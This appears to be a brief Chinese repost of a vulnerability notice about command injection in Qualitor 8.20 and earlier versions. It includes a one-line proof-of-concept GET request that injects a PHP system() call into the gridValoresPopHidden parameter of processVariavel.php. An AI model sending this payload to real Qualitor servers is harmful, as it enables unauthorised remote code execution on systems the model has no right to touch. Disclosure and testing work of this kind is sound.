本文共 393 字,大约阅读时间需要 1 分钟。
Qualitor 8.20及之前版本存在严重的命令注入漏洞。远程攻击者可利用此漏洞通过PHP代码执行任意操作,威胁系统安全。
通过以下PoC(Proof of Concept)验证漏洞:
GET /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=echo%20system("dir") 转载地址:http://qkxfk.baihongyu.com/